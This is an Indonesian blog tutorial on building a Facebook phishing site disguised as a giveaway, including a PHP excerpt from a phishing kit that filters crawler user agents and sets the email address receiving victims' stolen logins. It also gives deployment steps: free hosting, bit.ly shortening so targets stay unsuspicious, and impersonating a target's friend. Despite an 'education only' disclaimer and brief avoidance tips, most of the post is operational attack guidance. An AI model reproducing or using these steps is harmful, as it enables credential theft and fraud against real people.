Cara Membuat Script Phising Facebook 2022 (True Login)

Web Phising kita kali ini sudah memiliki fitur True Login yang artinya jika target memasukan email dan password ngasal yang tidak terdaftar pada fb
Cara Membuat Script Phising Facebook 2023 (Tampilan Give Away) + True Login

Belakangan ini kita tengah dihebohkan akan kabar tentang kebocoran data milik KOMINFO yang berupa data pengguna sim card, pengguna indihome, dan data Pemilu. Informasi tersebut sudah banyak beredar di kalangan media masa yang dkemukakan oleh sang Hacker Bjorka.

Lalu bagaimana sang hacker mampu mendapatkan data pribadi korban? Ada banyak cara dan cara yang paling sederhananya adalah dengan melakukan Teknik Phising.

Membahas tentang Teknik Phising ialah sebuah teknik dari bentuk salah satu kejahatan siber lewat modus penipuan. Trik ini pertama kali ditemukan pada tahun 1995 dan parahnya sampai saat ini ternyata masih banyak juga orang yang menjadi korban dari teknik ini. Dengan menerapkan beberapa metode-metode yang tepat, maka tak dapat dipungkiri bahwa teknik ini masih dapat dikatakan layak untuk digunakan pada era proteksi yang canggih saat ini.

Teknik yang sering dipakai oleh Phiser (Orang yang melakukan Phising) ialah social enginering. Pelaku berpura-pura sebagai orang terdekat korban lalu mengirimkan sebuah link phising, dan karena komoralan manusia akan makhluk sosial maka dengan senang hati dan tanpa beban si korban masuk ke dalam web phising tersebut dan mulai mengisi data yang diminta oeh website. Data tersebut biasanya data akses login seperti facebook, instagram, mobile banking, e-wallet dan lain-lain.

Dan mengejutkannya lagi ada laporan bahwa sebesar 30% pencurian data pasti melibatkan teknik phising. Tak tanggung pada awal tahun 2021 sebuah komunitas Anti Phising mencatat ada kurang lebih 160.000 website yang beredar siap menunggu korban.

Nah pada kesempatan kali ini kami akan berbagai bagaimana cara membuatScript Phising dengan tampilan yang unik yakni Tampilan Give Away.

Disclaimer: Artikel yang kami bagikan kali ini hanya bertujuan untuk edukasi bahwa jangan sembarangan memasukan data pribadi anda pada sembarang website.

Mengenal Web Phising Facebook

Seperti yang sudah dijelaskan di awal bahwa phising merupakan kejahatan siber dengan teknik membuat suatu website semirip mungkin dengan website asli dengan manipulasi psikologi target dengan tujuan mendapatkan data pribadi korban.

Kali ini kita akan belajar bagaimana membuat Script Phising Facebook untuk mendapatkan email dan password. Web Phising kita kali ini sudah memiliki fitur True Login yang artinya jika target memasukan email dan password ngasal yang tidak terdaftar pada facebook maka website akan memberi tahunya bahwa email atau kata sandi salah. Sangat mirip dengan website facebook yang asli.

Oknum yang melakukan ini biasanya akan menyamar menjadi teman atau kerabat korban dangan cara membuat fake account yang sama persis dengan kerabat atau teman target. Hal ini bertujuan supaya target mau membuka URL phising yang dikirim dan mulai mengisi datanya.

Cara Membuat Script Phising Facebook

Kami ingatkan kembali bahwa cara ini bertujuan untuk edukasi supaya kalian tidak terjebak dalam website phising.

Langkah pertama yang harus dilakukan untuk membuat website phising facebook adalah mendaftar Hosting gratis. Hosting ini nantinya akan menjadi tempat kita memplubikasikan website phising tersebut supaya online. Banyak sekali penyedia hosting gratis yang bisa kalian lihat di bawah ini.

Script Phising Facebook True Login (Tampilan Give Away)

Langkah selanjutnya adalah kalian harus memiliki script phising facebook nya yang bisa kalian download melalui tombol di bawah ini.

Setelah kalian mendownload script phising facebook di atas, ekstrak file nya yang berupa .zip lalu buka pada bagian imel.php. Maka kalian akana menemukan kod seperti berikut.

<?php 
$ua = $_SERVER['HTTP_USER_AGENT'];
if(preg_match('#Mozilla/4.05 [fr] (Win98; I)#',$ua) || preg_match('/Java1.1.4/si',$ua) || preg_match('/MS FrontPage Express/si',$ua) || preg_match('/HTTrack/si',$ua) || preg_match('/IDentity/si',$ua) || preg_match('/HyperBrowser/si',$ua) || preg_match('/Lynx/si',$ua)) 
{
header('https://www.facebook.com/MagelangNoobs.phtml');
die();
}
$mailto = "emailmu@gmail.com";
?>

Cari kode $mailto = "emailmu@gmail.com"; dan ubah bagian yang ditandai dengan alamat email kamu. Alamat email tersebut berfungsi untuk menerima hasil laporan data korban yang berhasil kamu retas.

Setelah semuanya selesai tinggal kalian upload script phising facebook tersebut ke tempat hosting kalian lalu sebarkan URL link phising website kalian ke target. Usahakan untuk memendekan URL tersebut menggunakan bit.ly supaya target tidak curiga.

Sampai sini kalian sudah berhasil membuat Website Phising Facebook Tampilan Give away (True Login)

Cara Menghindari Website Phising

Tips untuk menghindari website phising adalah dengan melihat URL nya. Biasanya website phising akan mencoba meniru URL website aslinya seperti contoh web asli memiliki URL "www.facebook.com" maka biasanya web phising akan meniru URL tersebut menjadi "www.facbook.com". Jika tidak teliti maka kalian bisa saja terjebak.

Tips lainnya supaya thindar dari website phising yaitu dengan melihat source codenya. Cara untuk melihat source code pada sebuah website bisa kalian lihat pada artikel kami di Cara Melihat Source Code (Inspect Elemen) Pada Sebuah Website.

Penutup

Sampai sini pembahasan kita tentang Script Phising Facebook. Bijaklah dalam menanggapi artikel ini dan jika ada pertanyaan silahkan bertanya apada kolom komentar. Terimakasih.

Cara Membuat Script Phising Facebook 2022 (True Login)
Blog ini dibuat dengan tujuan untuk berbagi kepada semua orang yang membutuhkannya.

You May Like These

Ikuti blog Siap Ngoding untuk mendapatkan notifikasi terbaru!